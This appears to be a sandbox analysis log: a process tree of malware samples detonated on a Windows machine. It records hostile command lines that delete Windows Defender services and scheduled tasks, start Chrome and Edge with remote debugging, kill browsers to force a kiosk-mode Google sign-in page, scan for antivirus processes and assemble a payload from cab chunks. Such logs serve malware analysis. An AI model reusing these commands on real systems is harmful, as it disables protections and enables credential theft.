        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        8⤵
        
        PID:14200
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:4560
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:5376
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        8⤵
        
        PID:2564
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:7744
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:7748
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        8⤵
        
        PID:4268
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        8⤵
        
        PID:560
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        8⤵
        
        PID:13204
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        8⤵
        
        PID:5644
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        8⤵
        
        PID:11688
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:7312
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        8⤵
        Launches sc.exe
        
        PID:7024
- - C:\Users\Admin\AppData\Local\Temp\10361660101\UYpk7xI.exe
    "C:\Users\Admin\AppData\Local\Temp\10361660101\UYpk7xI.exe"
    3⤵
    PID:6344
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:6596
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:2032
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffe33eddcf8,0x7ffe33eddd04,0x7ffe33eddd10
        6⤵
        
        PID:4796
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1412,i,9560398611858969094,705931183263099459,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2304 /prefetch:11
        6⤵
        
        PID:12456
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2236,i,9560398611858969094,705931183263099459,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2228 /prefetch:2
        6⤵
        
        PID:12440
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2128,i,9560398611858969094,705931183263099459,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2372 /prefetch:13
        6⤵
        
        PID:12480
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3224,i,9560398611858969094,705931183263099459,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3296 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:12620
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3232,i,9560398611858969094,705931183263099459,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3316 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:12492
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4212,i,9560398611858969094,705931183263099459,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4244 /prefetch:9
        6⤵
        Uses browser remote debugging
        
        PID:13156
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4456,i,9560398611858969094,705931183263099459,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4460 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:11668
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5192,i,9560398611858969094,705931183263099459,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5200 /prefetch:14
        6⤵
        
        PID:8664
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5288,i,9560398611858969094,705931183263099459,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5260 /prefetch:14
        6⤵
        
        PID:11848
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:9016
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x2f4,0x7ffe3353f208,0x7ffe3353f214,0x7ffe3353f220
        6⤵
        
        PID:8644
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1780,i,14756885832186726696,6389801193961811322,262144 --variations-seed-version --mojo-platform-channel-handle=1972 /prefetch:11
        6⤵
        
        PID:9316
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1944,i,14756885832186726696,6389801193961811322,262144 --variations-seed-version --mojo-platform-channel-handle=1940 /prefetch:2
        6⤵
        
        PID:9568
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2516,i,14756885832186726696,6389801193961811322,262144 --variations-seed-version --mojo-platform-channel-handle=2532 /prefetch:13
        6⤵
        
        PID:9916
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3488,i,14756885832186726696,6389801193961811322,262144 --variations-seed-version --mojo-platform-channel-handle=3524 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:12460
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3480,i,14756885832186726696,6389801193961811322,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:12436
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4092,i,14756885832186726696,6389801193961811322,262144 --variations-seed-version --mojo-platform-channel-handle=4252 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:11852
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4128,i,14756885832186726696,6389801193961811322,262144 --variations-seed-version --mojo-platform-channel-handle=4256 /prefetch:9
        6⤵
        Uses browser remote debugging
        
        PID:11760
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=4180,i,14756885832186726696,6389801193961811322,262144 --variations-seed-version --mojo-platform-channel-handle=4316 /prefetch:9
        6⤵
        Uses browser remote debugging
        
        PID:11516
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=3440,i,14756885832186726696,6389801193961811322,262144 --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:11720
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3708,i,14756885832186726696,6389801193961811322,262144 --variations-seed-version --mojo-platform-channel-handle=3724 /prefetch:14
        6⤵
        
        PID:11100
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5372,i,14756885832186726696,6389801193961811322,262144 --variations-seed-version --mojo-platform-channel-handle=5388 /prefetch:14
        6⤵
        
        PID:5348
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5364,i,14756885832186726696,6389801193961811322,262144 --variations-seed-version --mojo-platform-channel-handle=5620 /prefetch:14
        6⤵
        
        PID:2696
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5300,i,14756885832186726696,6389801193961811322,262144 --variations-seed-version --mojo-platform-channel-handle=5748 /prefetch:14
        6⤵
        
        PID:7940
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\4w479" & exit
        5⤵
        
        PID:16256
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        6⤵
        Delays execution with timeout.exe
        
        PID:9472
- - C:\Users\Admin\AppData\Local\Temp\10361680101\jokererer.exe
    "C:\Users\Admin\AppData\Local\Temp\10361680101\jokererer.exe"
    3⤵
    PID:7836
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:9224
- - C:\Users\Admin\AppData\Local\Temp\10361700101\530a71ca97.exe
    "C:\Users\Admin\AppData\Local\Temp\10361700101\530a71ca97.exe"
    3⤵
    PID:13988
- - C:\Users\Admin\AppData\Local\Temp\10361710101\c98bb80630.exe
    "C:\Users\Admin\AppData\Local\Temp\10361710101\c98bb80630.exe"
    3⤵
    PID:5472
- - C:\Users\Admin\AppData\Local\Temp\10361720101\33ffbb57bc.exe
    "C:\Users\Admin\AppData\Local\Temp\10361720101\33ffbb57bc.exe"
    3⤵
    PID:11700
- - C:\Users\Admin\AppData\Local\Temp\10361730101\34512a5f6e.exe
    "C:\Users\Admin\AppData\Local\Temp\10361730101\34512a5f6e.exe"
    3⤵
    PID:8572
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      Kills process with taskkill
      PID:8656
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      Kills process with taskkill
      PID:7544
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      Kills process with taskkill
      PID:10712
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      Kills process with taskkill
      PID:2776
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      Kills process with taskkill
      PID:3296
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:11884
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        
        PID:12220
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1976 -prefsLen 27097 -prefMapHandle 1980 -prefMapSize 270279 -ipcHandle 2056 -initialChannelId {14a48f43-a892-4ffd-888b-a4e7e1a9b4cc} -parentPid 12220 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12220" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        6⤵
        
        PID:11024
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2444 -prefsLen 27133 -prefMapHandle 2448 -prefMapSize 270279 -ipcHandle 2456 -initialChannelId {4cc189b2-a8be-4f2a-aa9d-755acf1f130e} -parentPid 12220 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12220" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        6⤵
        
        PID:5768
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3820 -prefsLen 25164 -prefMapHandle 3824 -prefMapSize 270279 -jsInitHandle 3828 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3836 -initialChannelId {485cdecc-c15c-45e5-b391-64bd5a003fa1} -parentPid 12220 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12220" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        6⤵
        
        PID:4900
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3980 -prefsLen 27274 -prefMapHandle 3984 -prefMapSize 270279 -ipcHandle 4068 -initialChannelId {2e501de1-d50f-4abe-b135-c3cb36b80c7f} -parentPid 12220 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12220" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        6⤵
        
        PID:2692
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4396 -prefsLen 34773 -prefMapHandle 2828 -prefMapSize 270279 -jsInitHandle 4408 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3048 -initialChannelId {df07eb9d-1a49-4cda-b64b-b3d289b3063f} -parentPid 12220 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12220" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        6⤵
        
        PID:7660
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4952 -prefsLen 35010 -prefMapHandle 4944 -prefMapSize 270279 -ipcHandle 4984 -initialChannelId {7349b91d-3dd2-4a75-9435-add8082e79c4} -parentPid 12220 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12220" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        6⤵
        
        PID:12692
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2916 -prefsLen 32952 -prefMapHandle 2920 -prefMapSize 270279 -jsInitHandle 5244 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5264 -initialChannelId {7e7105b5-c356-46b3-925a-81594ec665d8} -parentPid 12220 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12220" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        6⤵
        
        PID:6700
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5304 -prefsLen 32952 -prefMapHandle 5308 -prefMapSize 270279 -jsInitHandle 5312 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2920 -initialChannelId {f99d5d68-f0d7-4c80-96cb-99c780fdbd66} -parentPid 12220 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12220" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        6⤵
        
        PID:12624
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5280 -prefsLen 32952 -prefMapHandle 5404 -prefMapSize 270279 -jsInitHandle 5416 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5488 -initialChannelId {acd39e6e-75bb-4f1e-95f9-c391f776c5dd} -parentPid 12220 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12220" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        6⤵
        
        PID:9128
- - C:\Users\Admin\AppData\Local\Temp\10361740101\4eb4b60516.exe
    "C:\Users\Admin\AppData\Local\Temp\10361740101\4eb4b60516.exe"
    3⤵
    PID:12420
- - C:\Users\Admin\AppData\Local\Temp\10361750101\jokererer.exe
    "C:\Users\Admin\AppData\Local\Temp\10361750101\jokererer.exe"
    3⤵
    PID:13024
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1524
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:5388
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:11096
- - C:\Users\Admin\AppData\Local\Temp\10361760101\UYpk7xI.exe
    "C:\Users\Admin\AppData\Local\Temp\10361760101\UYpk7xI.exe"
    3⤵
    PID:7148
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:7176
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:34888
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe33eddcf8,0x7ffe33eddd04,0x7ffe33eddd10
        6⤵
        
        PID:35208
- - C:\Users\Admin\AppData\Local\Temp\10361770101\7IIl2eE.exe
    "C:\Users\Admin\AppData\Local\Temp\10361770101\7IIl2eE.exe"
    3⤵
    PID:23944
  - - C:\Windows\SysWOW64\CMD.exe
      "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
      4⤵
      PID:31320
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:2720
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        5⤵
        
        PID:16052
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:18912
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        5⤵
        
        PID:18892
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        5⤵
        
        PID:8608
    - - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        5⤵
        
        PID:11516
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        5⤵
        
        PID:28512
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        5⤵
        
        PID:17296
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        5⤵
        
        PID:26096
    - - C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        5⤵
        
        PID:26608
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        
        PID:3368
- - C:\Users\Admin\AppData\Local\Temp\10361780101\TbV75ZR.exe
    "C:\Users\Admin\AppData\Local\Temp\10361780101\TbV75ZR.exe"
    3⤵
    PID:24768
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:31244
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 31244 -s 476
        5⤵
        Program crash
        
        PID:30916
- - C:\Users\Admin\AppData\Local\Temp\10361790101\Rm3cVPI.exe
    "C:\Users\Admin\AppData\Local\Temp\10361790101\Rm3cVPI.exe"
    3⤵
    PID:32516
- - C:\Users\Admin\AppData\Local\Temp\10361800101\xZRvIQ5.exe
    "C:\Users\Admin\AppData\Local\Temp\10361800101\xZRvIQ5.exe"
    3⤵
    PID:33924
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:34376
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:34692
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:33988
- - C:\Users\Admin\AppData\Local\Temp\10361810101\u75a1_003.exe
    "C:\Users\Admin\AppData\Local\Temp\10361810101\u75a1_003.exe"
    3⤵
    PID:24528
- - C:\Users\Admin\AppData\Local\Temp\10361820101\EPTwCQd.exe
    "C:\Users\Admin\AppData\Local\Temp\10361820101\EPTwCQd.exe"
    3⤵
    PID:11676
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:8356
- - C:\Users\Admin\AppData\Local\Temp\10361830101\bot.exe
    "C:\Users\Admin\AppData\Local\Temp\10361830101\bot.exe"
    3⤵
    PID:27864
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
      4⤵
      PID:11436
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        5⤵
        
        PID:18220
      - C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        6⤵
        
        PID:22984
        
